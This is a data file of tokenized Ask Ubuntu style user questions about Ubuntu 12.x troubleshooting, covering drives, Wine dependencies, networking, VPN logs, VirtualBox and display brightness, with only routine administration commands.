269331	how to find internal hard drive when booting from usb ?	trying to rescue a friend 's computer . put ubuntu 12.10 on a flash drive , changed the boot order , and fired it up ; no problem . but now that i 'm in , i ca n't seem to find the internal drive ! any thoughts ? i ran sudo fdisk -l in the terminal and got this : disk /dev/sdb : 15.6 gb , 15610576896 bytes 119 heads , 55 sectors/track , 4658 cylinders , total 30489408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc3072e18 device boot start end blocks id system /dev/sdb1 * 8064 30489407 15240672 c w95 fat32 ( lba ) 99 % sure that 's the flash drive ; it 's 16gb . if that is the internal drive , i 'm just not sure how to mount it . when i tried to mount /dev/sdb1 /mnt/point it told me mount : only root can do that .
269332	text editor that can wrap text in predefined html tags like notepad++	i 'm new to ubuntu and am trying to figure out some things . in notepad++ it is possible to use webedit plugin and define keyboard shortcuts for different html tags . e. g. `` ctrl + p '' can wrap the text in paragraph tags . is there such an option in some of ubuntu 's editors . gedit seems quite slim without plugins so i have installed geany which seems more powerful , but i ca n't find such a plugin . thank you in advance for your suggestions .
269333	terminal-specific font settings	since sharp fonts are better for my eyes , i use the ms fonts with full hinting and no anti-aliasing , system wide . it works great for all applications , but the terminal . i 've found no fixed-width font that looks acceptable so far . is there a way to set font hinting to slight and turn on anti-aliasing only for the terminal ? ( i 'm using a 13.04 daily build with unity , if this matters . ) thanks in advance .
269336	wine dependencies	i 'm trying to install wine but there are a lot of dependencies , which i ca n't remove . if i choose no , them even more dependencies are asked to be removed . any idea how to install it ? rodhash @ preciousss : ~ $ sudo aptitude install wine the following new packages will be installed : binfmt-support { a } cabextract { a } fonts-droid { a } fonts-horai-umefont fonts-unfonts-core { a } gcc-4.7-base : i386 { a } gettext : i386 { ab } gettext-base : i386 { ab } libasn1-8-heimdal : i386 { a } libasound2 : i386 { a } libasound2-plugins : i386 { a } libasprintf0c2 : i386 { a } libasyncns0 : i386 { a } libavahi-client3 : i386 { a } libavahi-common-data : i386 { a } libavahi-common3 : i386 { a } libc6 : i386 { a } libcapi20-3 { a } libcapi20-3 : i386 { a } libcomerr2 : i386 { a } libcroco3 : i386 { a } libcups2 : i386 { a } libdb5.1 : i386 { a } libdbus-1-3 : i386 { a } libdrm-intel1 : i386 { a } libdrm-nouveau2 : i386 { a } libdrm-radeon1 : i386 { a } libdrm2 : i386 { a } libexif12 : i386 { a } libexpat1 : i386 { a } libffi6 : i386 { a } libflac8 : i386 { a } libfontconfig1 : i386 { a } libfreetype6 : i386 { a } libgcc1 : i386 { a } libgcrypt11 : i386 { a } libgd2-xpm : i386 { a } libgettextpo0 : i386 { a } libgif4 : i386 { a } libgl1-mesa-dri : i386 { a } libgl1-mesa-glx : i386 { ab } libglapi-mesa : i386 { a } libglib2.0-0 : i386 { a } libglu1-mesa : i386 { a } libgnutls26 : i386 { a } libgomp1 : i386 { a } libgpg-error0 : i386 { a } libgphoto2-2 : i386 { a } libgphoto2-port0 : i386 { a } libgpm2 : i386 { a } libgssapi-krb5-2 : i386 { a } libgssapi3-heimdal : i386 { a } libgstreamer-plugins-base0.10-0 : i386 { a } libgstreamer0.10-0 : i386 { a } libhcrypto4-heimdal : i386 { a } libheimbase1-heimdal : i386 { a } libheimntlm0-heimdal : i386 { a } libhx509-5-heimdal : i386 { a } libice6 : i386 { a } libieee1284-3 : i386 { a } libjack-jackd2-0 : i386 { a } libjbig0 : i386 { a } libjpeg-turbo8 : i386 { a } libjpeg8 : i386 { a } libjson0 : i386 { a } libk5crypto3 : i386 { a } libkeyutils1 : i386 { a } libkrb5-26-heimdal : i386 { a } libkrb5-3 : i386 { a } libkrb5support0 : i386 { a } liblcms1 : i386 { a } libldap-2.4-2 : i386 { a } libllvm3.1 : i386 { a } libltdl7 : i386 { a } liblzma5 : i386 { a } libmpg123-0 { a } libmpg123-0 : i386 { a } libncurses5 : i386 { a } libnss-winbind { a } libodbc1 { a } libogg0 : i386 { a } libopenal1 : i386 { a } liborc-0.4-0 : i386 { a } libp11-kit0 : i386 { a } libpam-winbind { a } libpciaccess0 : i386 { a } libpcre3 : i386 { a } libpng12-0 : i386 { a } libpulse0 : i386 { a } libroken18-heimdal : i386 { a } libsamplerate0 : i386 { a } libsane : i386 { a } libsasl2-2 : i386 { a } libsasl2-modules : i386 { a } libselinux1 : i386 { a } libsm6 : i386 { a } libsndfile1 : i386 { a } libspeexdsp1 : i386 { a } libsqlite3-0 : i386 { a } libssl1.0.0 : i386 { a } libstdc++6 : i386 { a } libtasn1-3 : i386 { a } libtiff5 : i386 { a } libtinfo5 : i386 { a } libtxc-dxtn-s2tc0 : i386 { a } libunistring0 : i386 { a } libusb-0.1-4 : i386 { a } libusb-1.0-0 : i386 { a } libuuid1 : i386 { a } libv4l-0 : i386 { a } libv4lconvert0 : i386 { a } libvorbis0a : i386 { a } libvorbisenc2 : i386 { a } libwind0-heimdal : i386 { a } libwrap0 : i386 { a } libx11-6 : i386 { a } libx11-xcb1 : i386 { a } libxau6 : i386 { a } libxcb-glx0 : i386 { a } libxcb1 : i386 { a } libxcomposite1 : i386 { a } libxcursor1 : i386 { a } libxdamage1 : i386 { a } libxdmcp6 : i386 { a } libxext6 : i386 { a } libxfixes3 : i386 { a } libxi6 : i386 { a } libxinerama1 : i386 { a } libxml2 : i386 { a } libxpm4 : i386 { a } libxrandr2 : i386 { a } libxrender1 : i386 { a } libxslt1.1 : i386 { a } libxt6 : i386 { a } libxxf86vm1 : i386 { a } ttf-droid { a } ttf-mscorefonts-installer { a } ttf-umefont { a } ttf-unfonts-core { a } unixodbc { a } unrar { a } winbind { a } wine wine-gecko1.4 { a } wine-gecko1.4 : i386 { a } wine1.4 { a } wine1.4-amd64 { a } wine1.4-common { a } wine1.4-i386 : i386 { a } winetricks { a } zlib1g : i386 { a } 0 packages upgraded , 151 newly installed , 0 to remove and 0 not upgraded . need to get 144 mb of archives . after unpacking 505 mb will be used . the following packages have unmet dependencies : libgl1-mesa-glx : i386 : conflicts : libgl1 which is a virtual package . libgl1-mesa-glx-lts-quantal : conflicts : libgl1 : i386 which is a virtual package . conflicts : libgl1-mesa-glx : i386 but 9.0.2-0ubuntu0.1 is to be installed . gettext-base : conflicts : gettext-base : i386 but 0.18.1.1-9ubuntu1 is to be installed . gettext-base : i386 : conflicts : gettext-base but 0.18.1.1-9ubuntu1 is installed . gettext : conflicts : gettext : i386 but 0.18.1.1-9ubuntu1 is to be installed . gettext : i386 : conflicts : gettext but 0.18.1.1-9ubuntu1 is installed . libglapi-mesa-lts-quantal : conflicts : libglapi-mesa : i386 but 9.0.2-0ubuntu0.1 is to be installed . libgl1-mesa-dri-lts-quantal : conflicts : libgl1-mesa-dri : i386 but 9.0.2-0ubuntu0.1 is to be installed . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) gettext : i386 [ not installed ] 2 ) gettext-base : i386 [ not installed ] 3 ) libgl1-mesa-dri : i386 [ not installed ] 4 ) libgl1-mesa-glx : i386 [ not installed ] 5 ) libglapi-mesa : i386 [ not installed ] 6 ) libglu1-mesa : i386 [ not installed ] 7 ) wine [ not installed ] 8 ) wine1.4 [ not installed ] 9 ) wine1.4-amd64 [ not installed ] 10 ) wine1.4-common [ not installed ] 11 ) wine1.4-i386 : i386 [ not installed ] leave the following dependencies unresolved : 12 ) winetricks recommends wine1.5 | wine1.4 | wine | cxoffice5 | cxgames5 13 ) wine-gecko1.4 recommends wine1.4-amd64 14 ) wine1.4-i386 : i386 recommends gettext : i386 15 ) wine-gecko1.4 : i386 recommends wine1.4-i386 : i386 accept this solution ? [ y/n/q/ ? ] thanks ! !
269340	ubuntu 12.10 installation hang on console screen : `` output lvds-1 is running on crtc 1 using output a ''	i 'm trying to install ubuntu 12.10 ( 32 bits ) on a ( rather old ) hp pavilion zd7010ca laptop . i 'm running the install so it replace everything on the laptop . everything went fine , i passed the various installations screen until i got the `` learn more about ubuntu while the system installsâś '' , but i did not get the `` installation complete '' screen , instead , i got this : the mouse pointer is there and move with the mouse , but nothing else . after my failed attempt to install ubuntu 12.10 , i decided to try to install ubuntu 12.04.2 ( 32 bits ) instead . but after only 2 screen , ( selection of the language an the one you could select `` download update while installing '' the installation hang on this console screen . again , the mouse pointer is there and move with the mouse , but nothing else .
269342	how to add programs to ubuntu menus	i 'm just new to ubuntu and i need to know how to add programs like sublime text to my ubuntu gui menus . sublime doens't come with an installer - you just download the tar file and extract it . i tried to follow this post how can i add and change items in my applications menu ? but i could n't find the menu editor in ubuntu 12.10. any help would be appreciated . thank you .
269362	is it possible to edit same juju environment on different machines ?	if i want to edit my already-deployed environment on multiple machines . what should i do if i do n't want to ssh the origin environment-setting machine ?
269364	can ' t connect to wireless networks on my macbook	i am new to this `` ubuntu '' software ( just downloaded it ) . i have ubuntu 12.10 . i am trying to connect to my wireless network . i have tried everything on the `` ubuntu help '' page but still nothing . i 'm using a macbook pro 13 '' , late 2011 .
269367	easiest way to assign a static ip address for a lamp server / vbox snapshot	i want to create a basic ubuntu 12.04 lamp server under vbox . once i have it configured with a base data set i want to snapshot that and be able to hand it off to my development partners to use . basically i want to be able to clone/snapshot a ready to use lamp server . i am under the impression i would want to assign a static ip / hostname and then open port 3306 using iptables . i would then provide this info to anyone using this database server . to that end i am installing ubuntu server 12.04 and lamp and then following the standard tutorials on setting a static ip . i have etc/network/interfaces configured but when it comes to writing the nameserver entries in resolv.conf , i open it but the first two lines state not to edit that changes will be lost . here is what i have in /etc/network/interfaces auto eth0 iface etho inet static address 192.168.1.155 netmask 255.255.255.0 network 192.168.1.1 gateway 50.43.32.1 broadcast 192.168.1.255 nameserver 184.16.33.54 184.16.4.22 when i attempt to restart the network i get an error stating : reconfiguring network interfaces rtnetlink answers : file exists failed to bring up eth0 [ ok ] what would i edit to effect the hostname changes and better yet might there be an easier way to accomplish what i am after . i know i can edit my internal network to assign a static ip and i am doing that for a network storage device , but i would rather not rely on that interface to be there for others in this case . thanks for any the input and advice in advance .
269369	mysql datadir removed	i accidentally remove the document /var/lib/mysql and when i tried to connect to the databases , the following information came up : mysql > show databases ; error 1018 ( hy000 ) : ca n't read dir of ' . ' ( errno : 13 ) what can i do with this ? any help will be grateful !
269370	synaptics touchpad becomes unresponsive immediately after login	so , my touchpad works just fine when on login screen , but buttons and touchpad are completely unusable . here 's the kicker : the touchpad is not disabled . this occurred first after i locked the laptop and closed the lid while on battery power . please see the comment below , this fixed it for me .
269376	is it normal that ubuntu takes more than 2 hours in the partition process ?	i have an envy14 and i decided to install ubuntu 12.10 . with the instalation manager i configured the partitions that will work as root , /home and swap . but it has been almost two and a half hours and ubuntu is still stock on that process . is that normal ? i gave ubuntu 200 gb and the total of the hard drive is 640gb .
269377	best way to encrypt file on ubuntu but readable on a windows machine ?	what would be the best way to encrypt a file in ubuntu 12.04 but in a way that could be read by a windows 8 user ? would creating a truecrypt volume work if i just sent the truecrypt file over ? any other methods ?
269378	virtualbox guest additions installation error	i am having a lot of troubles to have my virtualbox guest additions installed , i got this message : verifying archive integrity ... all good . uncompressing virtualbox 4.2.10 guest additions for linux ... ... ... . virtualbox guest additions installer removing installed version 4.2.10 of virtualbox guest additions ... removing existing virtualbox dkms kernel modules ... done . removing existing virtualbox non-dkms kernel modules ... done . building the virtualbox guest additions kernel modules ... done . doing non-kernel setup of the guest additions ... done . starting the virtualbox guest additions ... fail ! ( modprobe vboxguest failed ) installing the window system drivers installing x.org server 1.13 modules ... done . setting up the window system to use the guest additions ... done . you may need to restart the hal service and the window system ( or just restart the guest system ) to enable the guest additions . installing graphics libraries and desktop services components ... done . my ubuntu is 12.10 , virtualbox is 4.2.10 and so the guest additions . i have tried the usual solutions as updating the linux headers , but nothing ... apt-get install dkms build-essential linux-headers-generic returns : build-essential is already the newest version . dkms is already the newest version . linux-headers-generic is already the newest version . this is the output of /var/log/vboxadd-install.log uninstalling modules from dkms attempting to install using dkms creating symlink /var/lib/dkms/vboxguest/4.2.10/source - > /usr/src/vboxguest-4.2.10 dkms : add completed . kernel preparation unnecessary for this kernel . skipping ... building module : cleaning build area ... . make kernelrelease=3.5.0-25-generic -c /lib/modules/3.5.0-25-generic/build m=/var /lib/dkms/vboxguest/4.2.10/build ... ... ... .. cleaning build area ... . dkms : build completed . vboxguest : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.5.0-25-generic/updates/dkms/ vboxsf.ko : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.5.0-25-generic/updates/dkms/ vboxvideo.ko : running module version sanity check . - original module - no original module exists within this kernel - installation - installing to /lib/modules/3.5.0-25-generic/updates/dkms/ depmod ... . dkms : install completed . creating user for the guest additions . creating udev rule for the guest additions kernel module . it happened to me also with previous versions of virtualbox and guest additions . i really need this thing working and i am really desperate right now ! many thanks ! i add here more info : $ cat vboxguestadditions.log starting the virtualbox guest additions ... fail ! ( modprobe vboxguest failed ) starting virtualbox guest addition service virtualbox additions module not loaded ! $ sudo modprobe vboxguest fatal : error inserting vboxguest ( /lib/modules/3.5.0-25-generic/updates/dkms/vboxguest.ko ) : no such device many thanks
269380	how do i change permissions on folder and files ?	i 've edited this post to hopefully make it clearer to anyone trying to help drwxr-xr-x [ tutorials ] -rwxr -- r -- [ helpguide.txt ] when the above are copied over from the dell laptop , they appear locked ( permission showing `` nobody/nogroup '' ) so i would like to change the permission to match the default permission that is applied to each newly created folder/file on the toshiba laptop . what i discovered is that any new folder and new file created on the toshiba laptop get : permission for folders : drwxrwxr-x permission for files : -rw-rw-r -- when copying/moving a folder containing files dell laptop : permission for folders : drwxr-xr-x permission for files : -rwxr -- r --
269383	how do i install drivers for geforce 8800 gts 512 ?	i am running ubuntu 12.10 32 bit with integrated video card i would like to disable the integrated video card and make the geforce 8800 gts 512 as the main one when booting up . please help me with the driver installation . description : vga compatible controller product : g92 [ geforce 8800 gts 512 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a2 width : 64 bits
269387	is ubuntu 12.04.2 64-bit the same for amd too ?	i have a asus k55vm-sx086d 64-bit . i was downloading ubuntu 12.04.2 lts 64-bit , but was confused the 64-bit version also includes amd too , and i have an intel motherboard . so : is ubuntu 12.04.2 64-bit and amd versions are same ? which will give me more performance for gaming , 32-bit or 64-bit ?
269399	pptp vpn ca n't connect	i am trying to connect to a pptp vpn server . the same config works fine in windows but fails in ubuntu 12.10 . it must be some configuration issue . sudo pptpsetup -- create myvpn -- server xxx.xxx.xxx.xxx -- username username -- password password everything is setup correctly . but then when i try to actually run the vpn i get this : $ sudo pppd call myvpn updetach using interface ppp1 connect : ppp1 < -- > /dev/pts/2 lcp : timeout sending config-requests connection terminated . modem hangup when i do this for more details : tail -n 30 /var/log/syslog | grep -i ppp mar 18 06:33:08 tp pppd [ 5082 ] : pppd 2.4.5 started by root , uid 0 mar 18 06:33:08 tp pppd [ 5082 ] : using interface ppp1 mar 18 06:33:08 tp pppd [ 5082 ] : connect : ppp1 < -- > /dev/pts/2 mar 18 06:33:08 tp networkmanager [ 988 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp1 , iface : ppp1 ) mar 18 06:33:08 tp networkmanager [ 988 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp1 , iface : ppp1 ) : no ifupdown configuration found . mar 18 06:33:08 tp networkmanager [ 988 ] : < warn > /sys/devices/virtual/net/ppp1 : could n't determine device driver ; ignoring ... mar 18 06:34:18 tp pppd [ 5082 ] : lcp : timeout sending config-requests mar 18 06:34:18 tp pppd [ 5082 ] : connection terminated . mar 18 06:34:18 tp networkmanager [ 988 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp1 , iface : ppp1 ) mar 18 06:34:18 tp pppd [ 5082 ] : modem hangup mar 18 06:34:18 tp pptp [ 5084 ] : anon warn [ decaps_hdlc : pptp_gre.c:216 ] : pppd may have shutdown , see pppd log mar 18 06:34:18 tp pppd [ 5082 ] : exit . why is it not connecting ? it works fine from windows , so it must be something with ubuntu 12.10 settings ... edit : sudo pppd call myvpn debug dump logfd 2 updetach is there any information about how to utilize this information to see what might have gone wrong ? pppd options in effect : debug # ( from command line ) updetach # ( from command line ) logfd 2 # ( from command line ) dump # ( from command line ) noauth # ( from /etc/ppp/peers/myvpn ) name username # ( from /etc/ppp/peers/myvpn ) remotename myvpn # ( from /etc/ppp/peers/myvpn ) # ( from /etc/ppp/peers/myvpn ) pty pptp xxx.xxx.xxx.xxx -- nolaunchpppd # ( from /etc/ppp/peers/myvpn ) crtscts # ( from /etc/ppp/options ) # ( from /etc/ppp/options ) asyncmap 0 # ( from /etc/ppp/options ) lcp-echo-failure 4 # ( from /etc/ppp/options ) lcp-echo-interval 30 # ( from /etc/ppp/options ) hide-password # ( from /etc/ppp/options ) ipparam myvpn # ( from /etc/ppp/peers/myvpn ) nobsdcomp # ( from /etc/ppp/peers/myvpn ) nodeflate # ( from /etc/ppp/peers/myvpn ) noipx # ( from /etc/ppp/options ) using channel 27 using interface ppp1 connect : ppp1 < -- > /dev/pts/2 sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] rcvd [ lcp confreq id=0x0 < mru 1400 > < auth chap md5 > < magic 0x27f847d4 > < pcomp > < accomp > < callback cbcp > < mrru 1614 > < endpoint [ local : f8.7d.55.9e.60.00.42.53.ac.37.23.b6.c9.f4.6d.2f.00.00.00.00 ] > < 17 04 01 00 > ] sent [ lcp confrej id=0x0 < callback cbcp > < mrru 1614 > < 17 04 01 00 > ] rcvd [ lcp confreq id=0x1 < mru 1400 > < auth chap md5 > < magic 0x27f847d4 > < pcomp > < accomp > < callback cbcp > < mrru 1614 > < endpoint [ local : f8.7d.55.9e.60.00.42.53.ac.37.23.b6.c9.f4.6d.2f.00.00.00.00 ] > < 17 04 01 00 > ] sent [ lcp confrej id=0x1 < callback cbcp > < mrru 1614 > < 17 04 01 00 > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] rcvd [ lcp confack id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] rcvd [ lcp confreq id=0x4 < mru 1400 > < auth chap md5 > < magic 0x27f847d4 > < pcomp > < accomp > < callback cbcp > < mrru 1614 > < endpoint [ local : f8.7d.55.9e.60.00.42.53.ac.37.23.b6.c9.f4.6d.2f.00.00.00.00 ] > < 17 04 01 00 > ] sent [ lcp confrej id=0x4 < callback cbcp > < mrru 1614 > < 17 04 01 00 > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] rcvd [ lcp confreq id=0x6 < mru 1400 > < auth chap md5 > < magic 0x27f847d4 > < pcomp > < accomp > < endpoint [ local : f8.7d.55.9e.60.00.42.53.ac.37.23.b6.c9.f4.6d.2f.00.00.00.00 ] > ] sent [ lcp confack id=0x6 < mru 1400 > < auth chap md5 > < magic 0x27f847d4 > < pcomp > < accomp > < endpoint [ local : f8.7d.55.9e.60.00.42.53.ac.37.23.b6.c9.f4.6d.2f.00.00.00.00 ] > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] rcvd [ lcp confreq id=0x9 < mru 1400 > < auth chap md5 > < magic 0x27f847d4 > < pcomp > < accomp > < endpoint [ local : f8.7d.55.9e.60.00.42.53.ac.37.23.b6.c9.f4.6d.2f.00.00.00.00 ] > ] sent [ lcp confack id=0x9 < mru 1400 > < auth chap md5 > < magic 0x27f847d4 > < pcomp > < accomp > < endpoint [ local : f8.7d.55.9e.60.00.42.53.ac.37.23.b6.c9.f4.6d.2f.00.00.00.00 ] > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x4e812c17 > < pcomp > < accomp > ] rcvd [ lcp confreq id=0xc < mru 1400 > < auth chap md5 > < magic 0x27f847d4 > < pcomp > < accomp > < endpoint [ local : f8.7d.55.9e.60.00.42.53.ac.37.23.b6.c9.f4.6d.2f.00.00.00.00 ] > ] sent [ lcp confack id=0xc < mru 1400 > < auth chap md5 > < magic 0x27f847d4 > < pcomp > < accomp > < endpoint [ local : f8.7d.55.9e.60.00.42.53.ac.37.23.b6.c9.f4.6d.2f.00.00.00.00 ] > ] lcp : timeout sending config-requests connection terminated . modem hangup waiting for 1 child processes ... script pptp xxx.xxx.xx.xxx -- nolaunchpppd , pid 6815 script pptp xxx.xxx.xx.xxx -- nolaunchpppd finished ( pid 6815 ) , status = 0x0
269400	replicate update-manager at the terminal	i would have thought that the graphical update-manager could be reproduced from the terminal commands : sudo apt-get update sudo apt-get upgrade -y sudo apt-get dist-upgrade -y yet i can run these commands at the terminal and despite seeing lots of things get upgraded then open the gui update-manager immediately afterwards and see that it has a list of updates it wants me to apply . why is this ? for example today sambda nameserive integration server , command line smb/cifs clients for unix , ... ... etc are all queued in gui update-manager despite minutes before running the three terminal commands above . what is going on here ?
269402	installing software in kubuntu	i have recently installed kubuntu . i am able to install softwares from muon software center . but when i try to do so from the terminal , i get errors . for instance on trying to update , i get : err http : //archive.canonical.com quantal inrelease err http : //archive.canonical.com quantal release.gpg unable to connect to archive.canonical.com : http : err http : //archive.ubuntu.com quantal inrelease err http : //archive.ubuntu.com quantal release.gpg unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.201 80 ] reading package lists ... done w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/inrelease w : failed to fetch http : //archive.canonical.com/dists/quantal/inrelease w : failed to fetch http : //archive.canonical.com/dists/quantal/release.gpg unable to connect to archive.canonical.com : http : w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.201 80 ] w : some index files failed to download . they have been ignored , or old ones used instead . similary when i try to install git-core , i get : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : git git-man liberror-perl suggested packages : git-daemon-run git-daemon-sysvinit git-doc git-el git-arch git-cvs git-svn git-email git-gui gitk gitweb the following new packages will be installed : git git-core git-man liberror-perl 0 upgraded , 4 newly installed , 0 to remove and 0 not upgraded . need to get 6,704 kb of archives . after this operation , 15.4 mb of additional disk space will be used . do you want to continue [ y/n ] ? y err http : //archive.ubuntu.com/ubuntu/ quantal/main liberror-perl all 0.17-1 could not connect to archive.ubuntu.com:80 ( 91.189.92.202 ) . - connect ( 111 : connection refused ) [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com/ubuntu/ quantal/main git-man all 1:1.7.10.4-1ubuntu1 unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com/ubuntu/ quantal/main git i386 1:1.7.10.4-1ubuntu1 unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.202 80 ] err http : //archive.ubuntu.com/ubuntu/ quantal/main git-core all 1:1.7.10.4-1ubuntu1 unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.202 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libe/liberror-perl/liberror-perl_0.17-1_all.deb could not connect to archive.ubuntu.com:80 ( 91.189.92.202 ) . - connect ( 111 : connection refused ) [ ip : 91.189.92.202 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/git/git-man_1.7.10.4-1ubuntu1_all.deb unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.202 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/git/git_1.7.10.4-1ubuntu1_i386.deb unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.202 80 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/g/git/git-core_1.7.10.4-1ubuntu1_all.deb unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.202 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? how do i handle this . i am using internet behind a proxy server , if that matters .
269403	what exactly does backup store ?	i just go by default backup . therefore , after reinstalling ubuntu 12.04 , i restored the backup , expecting megabytes of libreoffice writer files to show up on my desktop . they never appeared after restoring successfully . did i just wasted my entire work on misunderstanding on what backup really is ?
269405	how to check the speed/problems of network-manager ?	in between suspend and awake my system of course drops its wlan connection . then once awakend from its suspend notwork-manager tries to reestablish the connection . all works fine , i think but : doing the same on my dual-boot win-8 system is so much faster ( wlan + with it internet is there instantly < 1sec ) on my ubunut it takes 10+ seconds or more . what could be a way to check for problems in network-mangager ? or any other way to `` bring it to speed '' ( it must be possible , as even win8 does it ! ) update looking for the gap in /var/log/syslog i can see already a `` huge '' ( at least annoying 4 sec time gap in between ( see yourself ) : mar 18 08:52:22 freak networkmanager [ 1428 ] : ( wlan0 ) : supplicant interface state : disconnected - > scanning mar 18 08:52:26 freak wpa_supplicant [ 1717 ] : trying to authenticate with c0:25:06 : c6 : b4 : fe ( ssid='mywlan_essid ' freq=2472 mhz ) who is so slow ?
269406	how to use ' and `` ( quotes ) as an argument	intro in a script i want to run a command in a separate window so that output of the command will show in a new window ( which is an output stream like top ) and they do not interfere each other . for this i use gnome-terminal -x bash -c 'command ' . for example : `` \ can be printed using gnome-terminal -x bash -c 'echo `` \ '' \\ '' ; read ' or gnome-terminal -x bash -c 'echo -e `` \x22\x5c '' ; read ' . i just do n't interested in hexadecimal as it will not work with other command than echo . question how can i print `` ' ? executing gnome-terminal -x bash -c 'echo `` \ '' \ ' '' ; read ' is there any alternative to gnome-terminal -x bash -c to run a command in a new window ? ( not in background ) . my case gnome-terminal -x bash -c 'perl -le 'open ( p , '' sudo nethogs lo | '' ) ; $ |=1 ; while ( < p > ) { print `` -- -- -- '' , '' $ _ '' ; } ' > > /tmp/a.txt'` what i do currently is assign perl code to a variable cmd_perl='open ( p , '' sudo nethogs ppp0 | '' ) ; $ |=1 ; while ( < p > ) { print `` -- -- -- '' , '' $ _ '' ; } ' save to a file echo `` $ cmd_perl '' > `` /tmp/cmd_perl.pl '' execute it in bash pointing file gnome-terminal -x bash -c 'perl /tmp/cmd_perl.pl > > /tmp/nethogs-dump-from-perl.hex ' this method works fine . i want to avoid the use of temp file . how to use echo command to show ' ? does n't answer my question .
269407	how to install ubuntu to a usb drive from an iso image	i want to install ubantu on a 4 gb pendrive but my cd writer is not working so i wnt it to install from the iso that i have downloaded . how to do that ?
269408	ubuntu blank screen after install on hp pavilion g6 laptop	i have installed ubuntu 12.04 lts alongside windows 7 . upon boot i observe that after the splash screen is displayed , screen goes black though i am able to hear login prompt . i am new to ubuntu ( and linux ) therefore i will request you please suggest step-wise approach to fix the issue .
269412	ati hd 6320 asus brightness does n't change	when i press function + [ f5 or f6 ] to increase or decrease the brightness , the adjustment display on top right pops out and the slider moves but the screen brightness remains the same . i 've done various changes to the grub file such as changing the value grub_cmdline_linux= '' quiet splash acpi_osi=linux acpi_backlight=vendor '' or grub_cmdline_linux_default= '' quiet splash pcie_aspm=force acpi_backlight=vendor '' or grub_cmdline_linux= '' quiet splash acpi_backlight=vendor '' or grub_cmdline_linux= '' quiet splash acpi_osi=linux '' sudo update-grub to each of them and reboot . still none of them works . i 've also tried changing the value manually using the method : cat /sys/class/backlight/acpi_video0/brightness it gave me the output value 50 , tried lower it down to 2 with : echo 2 | sudo tee /sys/class/backlight/acpi_video0/brightness still , nothing changed . the brightness remain the same help is very much appreciated . fglrxinfo display : :0.0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6320 graphics opengl version string : 4.2.12172 compatibility profile context 12.10.17
269422	read out loud feature on acroread	i just installed adobe reader 9 ( acroread ) package from the ubuntu software center . i am trying to activate the read out loud feature but it does n't seem to work . i have tried fixes mentioned everywhere : i installed libgnome-speech7 package and ran : sudo /var/lib/dpkg/info/acroread.postinst configure the output of this command turns out to be : no lsb modules are available . does anyone know how to get read out loud work ? also , i am not able to get the adobe reader browser plugin to work . i installed the ia32-libs package since i am on a 64-bit system . but , no dice . the browser plugin is also not working . could anybody please help me out here ?
269425	need driver for techwell tw6805a or another multichannel capture-card	i am building a video-mix-server and need a capture-card , that captures video in 25fps at pal-resolution from analog input devices ( min . 4 ones ) i found some cards with the techwell tw6805a chipset , that are effordable . ( for example this card ) is there any linux-driver there , that allows me to use all channels , the card supports ? or is there any other card , that is linux compatible , under 500âź and supports a minimum of 4 channels at 25 frames per second each in full pal resulution ?
269429	how can i rotate video by 180 degrees with avconv	i 'd like to rotate video ( mp4 ) by 180 degrees , but not flip . is it possible to do it with avconv ?
